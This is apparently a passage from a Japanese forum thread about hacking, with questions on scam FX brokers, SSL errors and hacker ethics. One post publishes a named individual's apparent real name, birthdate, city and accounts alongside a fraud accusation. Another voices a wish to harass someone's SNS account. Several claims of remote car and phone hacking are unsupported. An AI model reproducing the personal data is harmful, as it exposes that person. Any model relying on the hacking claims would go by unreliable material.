その中の www.triton-fx.comとforexexmarkets.comは、詐欺を疑われている幾つかの投資案件で指定された海外FXブローカーでした。
吉村修一SATELLITE PROJECT(サテライトプロジェクト) 川越諒太郎のREBOOT PROJECT
上の二つのブローカーに入金する手段は、通常の銀行振込の他に現在は閉鎖さている"pay wallet"と言うサービスが推奨されていた。
https://paywallet.paymentplatform.cc/jp/login 今回のatlas forexへの入金手段にも"pay wallet"は使われていた
atlas forexへの入金先口座名義人はhttps://kaigaifx-wiki.com/19229/に詳しく書かれています。
今のところは以上です。どんな些細な事でも良いのでよろしくお願いします
>>672
ここは、専門家に聞くのが妥当だろ。 電気の絵画盗電やクレジットカードのデータ盗電を考える #ビッグデータ #セキュリティ
何故ソーラー発電が重要か? http://shop-rakuten-ch.2chblog.jp/archives/7084934.html
セキュリティ社会の悪影響
テロとつながっているテレビの裏側 同一人物ヤラセ仕込みインタビュー
オカルトじゃなく現実
http://tv-jittai.blog.jp/archives/23875784.html 自宅のWifiルーラーを一日通して負荷テストをしたいんですが
何かいツールはないですか?
あんがい簡単に自動かツールでできるんですかね? ムカつくやつのSNSアカウント見つけた
どうにかしてやりたい すみません、質問なんですがブラウザでjavaだのwebsocketだの実行してどうなるか実験したいのですが、
ブラウザの開発ツールの制限がかかってて、ブロックされるのですが、
何か使えるブラウザありませんか?最新のがいいです。
>>681
1年ぶりにもどってきた
開発ツールに制限がかかってる??
よくわからないが、検証するだけだったらプログラム上だけで不足??
環境と状態の詳細を求む >>681
Chromeで制限解除なら--disable-xss辺りですかな?
ブラウザの開発はローカルとサーバー上のデータの扱いが異なるので仮想環境にサーバー建てるのが宜しいですぞ がくせーさん、ナナシさん、ありがとうございます。
ちょっとこれから出かけるのでお昼過ぎになると思いますが、
状態の方と環境の詳細の方書きますので、しばらくお待ちいただけると幸いです。 すみません、質問しようと思ったのですが
単語がサイトのブロックに引っかかって駄目みたいですね。 何度も失礼します。
virutalboxのubuntuのfirefox
安全な接続ができませんでした
サイトのURL:80 への接続中にエラーが発生しました。SSL received a record that exceeded the maximum permissible length.
エラーコード: SSL_ERROR_RX_RECORD_TOO_LONG
受信したデータの真正性を検証できなかったため、このページは表示できませんでした。
この問題をウェブサイトの管理者に連絡してください。
あるスクリプトをこのサイトで起動して表示させたいのですが、
このエラーはどうすれば直るでしょうか? ぱっとみで申し訳ないですが、多分SSL周りのエラーですね
URLに80番をつけてアクセスするか、ミドルウェアを実装している場合はport443 SSL
周りの設定を見直してみてください 申し訳ありません、ubuntuはあんまりやった事がないので、
どこにあるどの設定ファイルを変えればいいか解りません。
ubuntuでもSSL周りの設定のファイルはデフォルトであるのでしょうか?
あと、URLに80番をつけてアクセスは試したのですが駄目でした。
httpsのsも外れません(httpsでしかアクセスできない) ミドルウェアの事が最初解らなかったのですが、調べてみました。
そしてApacheをインストール後、何分かして443ポートを解放できました。
アクセスできました、ありがとうございます。 忙しくてみれてませんでしたー
良かったです!正直開発でミドルウェアを見るのはめんどくさいので、Dockerを使うかブラウザの設定見直してみるかしたほうがいいかもしれませんね! >>686
>あるスクリプトをこのサイトで起動して表示させたいのですが、
このエラーはどうすれば直るでしょうか?
お前が死んだら直るだろう。。。。きっと。。。 >>688
>申し訳ありません、ubuntuはあんまりやった事がないので>
嘘つけ!! いつもやっているくせに。。。 Pythonねぇ。うん、そうだね、Pythonの脆弱性だよね。
Pythonは、様々な脆弱性持っているよね。
xss、SQインジェクション、他にもいろいろと。。。
そこで、どうすればいいの?
決まっているよね、まずはパッケージの削除、あとは実行不能だよね(笑) >>248
やろうと思えばできます。ですが、日本の法律だと使い道や危険度によっては罰せられます。
(研究用ならまあ...)
草あ >>698
なれます。コッチとしては、なって欲しくないけど。 >>703
ハッカーを「スキルレベルを示す標語」と考えると、「それなりのスキル持ち」だと解釈できる。それはいい、それ自体は。但し、セキュリティ分野では「自分の能力をどっちの方面に使うか?」が非常に重要。マジンガーZじゃないけど、相応のスキル持ちは「善玉」にも「悪玉」にもなれる。
凄腕セキュリティEgが居るとして、会社組織でそれなりの給料貰ってモラル維持できていれば、大抵はその能力を「善玉(セキュリティ)」に使ってる。が、野に放たれてモラルを失し、反社会的な生業を「是」とするようになると、それは「脅威」となる。ITセキュリティ技術ってのは、表裏一体なんだよ。
その意味で「ハッカー」という単語はどちらにも振れ得る怖い指標。だって、モラル維持してる「善玉」なら、自らを「ハッカー」呼ばわりはしないからね、彼等は自らを「セキュリティEg」と呼ぶ事の方が多い。そうでない人(どちらに振れるか分からない人/or/ダークサイドに堕ちた人)は、自らを「ハッカー」と称する事が多い印象。
セキュリティEgの立場としては、「不安定なモラルの状態でスキルのみ突出した人」は怖い存在と言わざるを得ない。だって、自らを「ハッカー」と称する事自体、他者に対する「マウント感」を感じるし、その「マウント感」を満足させる為に、安易に「自らのスキルを誇る行為(感染とか乗っ取りとか)」に転びかねない危惧を感じる。
だから、「ハッカーはヤメて、セキュリティEg(こっち側)に来て」って思うんだよな。
正直俺だって「職」を失って金に窮すれば、いつでの「あっち側」で稼ぐ自身はあるもの。やらないけどね。 tes
メノウさん とは
自称シンガーソングライター
本名 一戸健男(いちのへたけお)
東京都立川市在住
1982年10月14日生まれ
俺は日々進化している(発言に一貫性無し)
集客見込みたてばライブしたい
http://imepic.jp/JuZ7dxDI
詐欺に加担したけど令和4年も生存
https://itest.5ch.net/hobby11/test/read.cgi/watch/1206038284/
都合の悪いコメントは表示してくれないチャンネルはこちら(目指せ1000人)
https://youtube.com/channel/UC3utyfIO5CcqCtNc1iLRVYA
ご意見はツイッターDMへとのこと
twitter.com/agate9menou?s=11
https://twitter.com/5chan_nel (5ch newer account) >>698
無理
脳みそ硬化してからじゃハッカーとしてのセンスは絶対に身につかない 頭もよくないけど、知識とか教えてくれる人が欲しいです。反応あればインスタ載せるのでDM下さい。 >>709
@c16h12fn3o3_r
ハッキングおじさんとニコイチになりたいです。 >>711
見てもらえましたか?アドレス置いときます。 ハッキング・ラボの作り方買え 4000円くらいだ
自分のPCで自分のPCに攻撃してウェブカメラ覗いて満足した。 この度マイカーをハッキングされて事故を工作されました
私はドライブレコーダーに明解に証拠が残る様な操作をされましたが
細かな捜査で事故を工作された人も居るだろう
海外では問題にされている
下記スレタイで恐ろしいハッキングの現況を知ろう
Hackers Remotely Kill a Jeep on a Highway | WIRED 【ありがとう自民党】個人情報一体化のマイナ保険証、他人の個人情報が紐付けされる不祥事が早くも見つかる★2 [Hitzeschleier★]
ttp://asahi.5ch.net/test/read.cgi/newsplus/1683863795/ iPhoneハッキング受けると右上半分加熱しませんか?
最近特に変な目にあって大概加熱する異変が起きます